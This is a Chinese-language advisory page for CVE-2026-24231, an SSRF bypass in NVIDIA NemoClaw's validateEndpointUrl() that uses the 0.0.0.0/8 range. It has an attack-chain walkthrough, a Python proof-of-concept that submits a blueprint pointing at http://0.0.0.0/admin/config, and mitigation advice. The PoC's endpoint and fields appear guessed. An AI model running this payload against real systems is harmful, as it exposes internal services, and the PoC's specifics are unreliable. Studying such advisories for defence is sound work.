CVE-2026-24231 NVIDIA NemoClaw SSRF漏洞

漏洞信息

漏洞编号

CVE-2026-24231

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

6.3 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

NVIDIA NemoClaw

漏洞概述

NVIDIA NemoClaw组件中存在严重的安全缺陷，具体位于其validateEndpointUrl() SSRF防护机制内。该漏洞未能正确识别并过滤0.0.0.0/8这一特殊IP地址范围，导致安全防护失效。攻击者可以通过精心构造的蓝图配置文件或命令行标志，提交包含恶意端点URL的请求。由于验证逻辑的疏漏，攻击者能够利用0.0.0.0/8地址段绕过现有的安全检查。成功利用此漏洞将导致服务端请求伪造攻击，进而可能引发敏感信息的未授权泄露，对系统的机密性构成严重威胁。

技术细节

该漏洞的深层技术原理在于NVIDIA NemoClaw框架中`validateEndpointUrl()`函数对SSRF攻击的防御机制存在逻辑缺陷。通常，SSRF防护会通过黑名单机制过滤内网敏感地址，如127.0.0.1或169.254.169.254（云元数据服务）。然而，该组件未能将`0.0.0.0/8`地址段纳入过滤范围。在TCP/IP网络规范中，`0.0.0.0/8`通常保留用于“本网络”或默认路由，但在特定应用上下文中，它可能被解析指向本地主机。攻击者利用这一盲点，通过修改蓝图配置文件（Blueprint configuration file）或指定特定的CLI命令行标志，传入指向`0.0.0.0/8`范围内地址的恶意URL。当NemoClaw处理该配置时，`validateEndpointUrl()`校验通过，随后后端服务会向该地址发起HTTP请求。由于该请求实际指向了本地敏感端口或服务，攻击者即可绕过网络边界防护，读取本地文件或探针内网信息，造成严重的信息泄露。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统正在使用NVIDIA NemoClaw组件，并确认其接受外部配置或CLI参数。

STEP 2

构建载荷

攻击者利用0.0.0.0/8地址段未被validateEndpointUrl()过滤的缺陷，构造指向本地敏感服务的恶意URL（如http://0.0.0.0:8080）。

STEP 3

注入配置

攻击者通过蓝图配置文件或命令行标志，将包含恶意URL的配置提交给NemoClaw处理。

STEP 4

绕过验证

NemoClaw的validateEndpointUrl()函数未能识别0.0.0.0/8为内网回环地址，验证通过。

STEP 5

执行请求

服务端向攻击者指定的0.0.0.0地址发起HTTP请求，由于解析指向本地，实际访问了本地受限资源。

STEP 6

信息泄露

攻击者通过分析服务器返回的响应内容，获取敏感配置信息或内部数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-24231
# This script demonstrates the bypass of validateEndpointUrl()
# using the 0.0.0.0/8 address range.

import requests
import json

# The vulnerable endpoint that accepts configuration
target_api = "http://127.0.0.1:8080/api/submit_blueprint"

# Malicious payload using 0.0.0.0 to bypass SSRF checks
# 0.0.0.0 is often treated as localhost but bypasses standard 127.0.0.1 filters
malicious_url = "http://0.0.0.0/admin/config"

# Constructing the blueprint configuration payload
payload = {
    "config_name": "exploit_config",
    "endpoint_url": malicious_url,
    "action": "fetch"
}

headers = {
    "Content-Type": "application/json"
}

try:
    print(f"[*] Attempting to send malicious payload to {target_api}")
    print(f"[*] Payload URL: {malicious_url}")
    
    response = requests.post(target_api, data=json.dumps(payload), headers=headers)
    
    if response.status_code == 200:
        print("[+] Request sent successfully. Check for information disclosure in response.")
        print(f"[+] Response Body: {response.text}")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

NVIDIA NemoClaw (具体受影响版本请参考NVIDIA官方安全公告)

防御指南

临时缓解措施

建议用户立即审查所有用于NemoClaw的蓝图配置文件，确保其中不包含指向0.0.0.0/8或其他内网保留地址段的端点URL。在应用补丁之前，可以通过网络防火墙规则阻断应用服务器发起的非必要出站连接，特别是指向本地回环地址的流量。